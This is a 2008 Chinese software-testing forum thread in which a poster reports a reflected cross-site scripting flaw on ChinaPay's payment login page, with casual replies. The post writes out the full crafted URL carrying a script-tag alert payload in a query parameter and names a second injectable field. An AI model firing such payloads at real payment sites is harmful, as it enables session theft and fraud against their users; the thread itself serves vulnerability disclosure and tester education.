51Testing软件测试论坛

 找回密码
 (注-册)加入51Testing

QQ登录

只需一步,快速开始

微信登录,快人一步

手机号码,快捷登录

查看: 7800|回复: 4
打印 上一主题 下一主题

[原创]银联电子支付chinapay安全性测试漏洞之“跨站脚本注入式攻击”

[复制链接]

该用户从未签到

跳转到指定楼层
1#
发表于 2008-6-12 16:33:30 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
[原创]银联电子支付chinapay安全性测试漏洞之“跨站脚本注入式攻击”

网站安全性测试,尤为重要,电子支付网站更是如此,本文作者以实例介绍了
(1)“Yeepay网站安全测试漏洞之跨站脚本注入”,原文地址:http://bbs.51testing.com/thread-113784-1-1.html
(2)“网银在线chinabank安全漏洞之不完善的开发软件包”,原文地址: http://bbs.51testing.com/thread-116660-1-1.html
(3)“支付宝alipay网站安全性测试漏洞之“无辜的备份文件”,原文地址:http://bbs.51testing.com/thread-116821-1-1.html
(4)“支付宝alipay网站安全性测试漏洞之“跨站脚本注入式攻击”,原文地址:http://bbs.51testing.com/thread-116826-1-1.html
(5)“快钱99bill网站安全性测试漏洞之“跨站式脚本注入”,原文地址:http://bbs.51testing.com/thread-116883-1-1.html
(6)“银联电子支付chinapay安全性测试漏洞之“不安全的目录设置”,原文地址:http://bbs.51testing.com/thread-117382-1-1.html   
如果你想了解更多软件测试,安全性测试,性能测试,自动化测试,测试管理等知识!欢迎访问我的Blog:卖烧烤的鱼的测试博客: http://mayingbao.cnblogs.com银联电子支付chinapay存在“跨站脚本注入式攻击”,经本文作者验证https://payment.chinapay.com/trf/G_chklogin.jsp此部分存在漏洞,于是构造脚本
https://payment.chinapay.com/trf/G_chklogin.jsp?EncMsg=>'><ScRiPt%20%0a%0d>alert(888888888888888888888)%3B</ScRiPt>&ret=mayingbao2002@163.com&IPAddr=61%2E129%2E122%2E135%3A8081%2Ftrf%2F
访问后,弹出如下图

PS:经本文作者验证:https://payment.chinapay.com/trf/G_chklogin.jsp此部分也存在漏洞,其中分析得出最佳祸手为“ txtId ”字段^_^

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?(注-册)加入51Testing

x
分享到:  QQ好友和群QQ好友和群 QQ空间QQ空间 腾讯微博腾讯微博 腾讯朋友腾讯朋友
收藏收藏
回复

使用道具 举报

该用户从未签到

5#
发表于 2011-5-20 09:39:05 | 只看该作者
新手逛园 留个爪爪
回复 支持 反对

使用道具 举报

该用户从未签到

4#
发表于 2008-9-4 23:08:17 | 只看该作者
这类注入只是恶作剧摆了

 一方面体现在浏览器对Unicode的处理漏洞

 另一方面针对表单对特定字符的过滤处理不当
回复 支持 反对

使用道具 举报

该用户从未签到

3#
发表于 2008-9-4 11:43:26 | 只看该作者
lz 有空应该交流一下如何做黑客哦
回复 支持 反对

使用道具 举报

  • TA的每日心情

    2015-9-10 15:08
  • 签到天数: 1 天

    连续签到: 1 天

    [LV.1]测试小兵

    2#
    发表于 2008-6-18 09:25:38 | 只看该作者
    鱼兄  有空出个录像教程哈
    ^_^
    回复 支持 反对

    使用道具 举报

    本版积分规则

    关闭

    站长推荐上一条 /1 下一条

    小黑屋|手机版|Archiver|51Testing软件测试网 ( 沪ICP备05003035号 关于我们

    GMT+8, 2024-11-25 15:15 , Processed in 0.074351 second(s), 29 queries .

    Powered by Discuz! X3.2

    © 2001-2024 Comsenz Inc.

    快速回复 返回顶部 返回列表